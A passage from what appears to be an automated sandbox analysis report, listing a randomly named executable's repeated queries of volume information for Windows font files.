                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
